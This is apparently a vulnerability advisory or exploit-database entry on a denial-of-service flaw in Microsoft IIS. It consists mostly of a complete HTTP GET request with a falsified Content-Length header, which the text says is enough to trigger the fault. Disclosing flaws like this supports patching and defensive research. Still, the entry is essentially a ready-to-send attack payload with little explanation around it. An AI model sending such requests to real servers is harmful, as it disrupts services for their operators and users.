|
Microsoft IIS False Content-Length Field DoS Vulnerability
The following HTTP GET Header, containing a falsified Content-Length field, is sufficient to cause the unexpected behavior: GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Content-Length: 5300643 Authorization: Basic |
|
|
Privacy Statement |